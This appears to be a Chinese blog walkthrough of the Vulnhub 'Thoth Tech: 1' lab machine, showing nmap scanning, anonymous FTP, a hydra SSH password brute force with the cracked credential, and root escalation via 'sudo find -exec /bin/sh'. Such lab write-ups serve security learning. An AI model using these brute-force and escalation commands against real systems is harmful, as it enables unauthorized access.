首页 > 其他分享 >Vulnhub之Thoth靶机详细测试过程

Vulnhub之Thoth靶机详细测试过程

时间:2022-12-10 16:59:17浏览次数:43  
标签:pwnlab kali Thoth 192.168 Vulnhub 56.127 靶机 txt root

Thoth

作者: Jason_huawen

靶机基本信息

名称:Thoth Tech: 1

地址:

https://www.vulnhub.com/entry/thoth-tech-1,734/

识别目标主机IP地址

(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.59.0/16   |   Screen View: Unique Hosts                                                         
                                                                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                            
 192.168.56.100  08:00:27:6f:27:91      1      60  PCS Systemtechnik GmbH                                                    
 192.168.56.127  08:00:27:2b:0f:8b      1      60  PCS Systemtechnik GmbH                                                    

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.127

NMAP扫描

利用NMAP工具对目标主机进行全端口扫描:

┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.127 -oN nmap_full_scan
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-10 03:10 EST
Nmap scan report for bogon (192.168.56.127)
Host is up (0.000085s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             110 Jul 02  2021 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ac:d2:7b:75:80:67:f2:9d:95:67:52:99:c8:2f:ab:7b (RSA)
|   256 78:ca:86:73:b6:87:06:08:eb:7a:9c:ab:cf:9d:89:16 (ECDSA)
|_  256 93:49:d7:8c:1c:07:7e:8e:79:91:2b:bf:2d:0d:34:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:2B:0F:8B (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.58 seconds

NMAP扫描结果表明目标主机有3个开放端口21(FTP)、22(SSH)、80(HTTP)

获得Shell

根据NMAP扫描结果,首先收集FTP服务的信息:

┌──(kali㉿kali)-[~/Vulnhub/Thoth]
┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ ftp 192.168.56.127                    
Connected to 192.168.56.127.
220 (vsFTPd 3.0.3)
Name (192.168.56.127:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||60624|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             110 Jul 02  2021 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||30557|)
150 Opening BINARY mode data connection for note.txt (110 bytes).
100% |*********************************************************************************|   110       65.30 KiB/s    00:00 ETA
226 Transfer complete.
110 bytes received in 00:00 (54.91 KiB/s)
ftp> quit
221 Goodbye.
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ cat note.txt 
Dear pwnlab,

My name is jake. Your password is very weak and easily crackable, I think change your password.

目标主机允许FTP匿名访问,从目标主机FTP下载下来的Note.txt文件有如下信息:

  1. 用户名pwnlad, 而且其密码非常弱,但是不知道是FTP还是SSH,或者其他服务的密码?

  2. 用户名jake,也许是管理员角色

    既然密码比较肉,作者提示很清楚,那就用hydra工具进行破解:

┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.127 
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-10 03:18:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.127:22/
[STATUS] 124.00 tries/min, 124 tries in 00:01h, 14344279 to do in 1927:60h, 12 active
[22][ssh] host: 192.168.56.127   login: pwnlab   password: babygirl1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-10 03:21:02

结果用hydra工具在较短的时间内就破解出pwnlab的密码,本来还在猜是否是FTP或者甚至其他服务的密码?

┌──(kali㉿kali)-[~/Vulnhub/Thoth]
└─$ ssh [email protected]                                  
The authenticity of host '192.168.56.127 (192.168.56.127)' can't be established.
ED25519 key fingerprint is SHA256:92r1ZGJ7wYMcpzTK4CtNCLO1ib7UJVa+pSM1K3y/guc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.127' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 10 Dec 2022 08:22:21 AM UTC

  System load:  0.0                Processes:               118
  Usage of /:   24.3% of 19.56GB   Users logged in:         0
  Memory usage: 18%                IPv4 address for enp0s3: 192.168.56.127
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

66 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Jul  2 09:14:12 2021 from 192.168.1.11
pwnlab@thothtech:~$ id
uid=1001(pwnlab) gid=1001(pwnlab) groupwnlab@thothtech:~$ cat user.txt
5ec2a44a73e7b259c6b0abc174291359
ps=1001(pwnlab)
pwnlab@thothtech:~$ 

这样很轻松就拿到了user flag.

提权

二话不说,既然已经知道了pwnlab的密码,那看一下是否有sudo权限?

pwnlab@thothtech:~$ cat .bash_history 
cd root/
sudo nano /etc/vsftpd.conf
sudo su
su thoth_tech
ls
id
sudo -l
sudo find . -exec /bin/sh \; -quit
pwnlab@thothtech:~$ sudo -l
Matching Defaults entries for pwnlab on thothtech:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwnlab may run the following commands on thothtech:
    (root) NOPASSWD: /usr/bin/find

哈哈,轻松得很,可以通过find命令进行提权,具体提权方法,可以查询GTFOBINS网站:

pwnlab@thothtech:~$ sudo -u root /usr/bin/find . -exec /bin/sh \; -quit
# cd /root
# ls -alh
total 40K
drwx------  5 root root 4.0K Jul  2  2021 .
drwxr-xr-x 20 root root 4.0K Jun 28  2021 ..
-rw-------  1 root root   14 Jul  2  2021 .bash_history
-rw-r--r--  1 root root 3.1K Dec  5  2019 .bashrc
drwxr-xr-x  3 root root 4.0K Jun 28  2021 .local
-rw-------  1 root root  146 Jun 28  2021 .mysql_history
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r--r--  1 root root   57 Jul  2  2021 root.txt
drwxr-xr-x  3 root root 4.0K Jun 28  2021 snap
drwx------  2 root root 4.0K Jun 28  2021 .ssh
# cat root.txt
Root flag: d51546d5bcf8e3856c7bff5d201f0df6

good job :)
# 

至此已经拿到了root shell。 甚至没有对80端口进行分析。

标签:pwnlab,kali,Thoth,192.168,Vulnhub,56.127,靶机,txt,root
From: https://www.cnblogs.com/jason-huawen/p/16971843.html

相关文章

  • Vulnhub之Web Machine N7靶机测试过程
    WebMachineN7识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Web_machine_N7]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.62.0/16|ScreenVie......
  • vulnhub靶场渗透实战13-driftingblues3
    ​靶机下载地址:https://download.vulnhub.com/driftingblues/driftingblues3.ovavbox导入,网络模式桥接,靶机模式为简单。一:信息收集1;直接老样子吧,arp主机发现之后,nmap扫......
  • Vulnhub之Y0usef靶机详细测试过程
    Y0usef作者:jason_huawen靶机基本信息名称:y0usef:1地址:https://www.vulnhub.com/entry/y0usef-1,624/识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Y0urself]└─......
  • Vulnhub之Rickdiculously靶机详细测试过程
    Rickdiculously识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Rickdiculously]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.60.0/16|ScreenVie......
  • vulnhub靶场渗透实战12-driftingblues2
    ​vbox导入,网络桥接。靶机下载地址:https://download.vulnhub.com/driftingblues/driftingblues2.ova 一:信息收集1;主机发现。 2;开放服务端口。ftp匿名登录。 3......
  • Vulnhub之Kioptrix Level 4靶机详细测试过程
    KioptrixLevel4作者:jason_huawen靶机基本信息名称:Kioptrix:Level1.3(#4)地址:识别目标主机IP地址─(root......
  • Vulnhub之Kioptrix Level 3靶机详细测试过程
    KioptrixLevel3作者:jason_huawen靶机基本信息名称:Kioptrix:Level1.2(#3)地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/识别目标主机IP地址(roo......
  • Vulnhub之Kioptrix Level 2靶机详细测试过程
    KioptrixLevel2作者:jason_huawen靶机基本信息名称:Kioptrix:Level1.1(#2)地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/识别目标主机IP地址─(roo......
  • vulnhub靶场之DIGITALWORLD.LOCAL: FALL
    准备:攻击机:虚拟机kali、本机win10。靶机:digitalworld.local:FALL,下载地址:https://download.vulnhub.com/digitalworld/FALL.7z,下载后直接vbox打开即可。知识点:ffuf参数......
  • Vulnhub之Kioptix Level 1靶机详细测试过程
    KioptixLevel1作者:jason_huawen靶机基本信息名称:Kioptrix:Level1(#1)地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/提示:识别目标主机IP地址─(......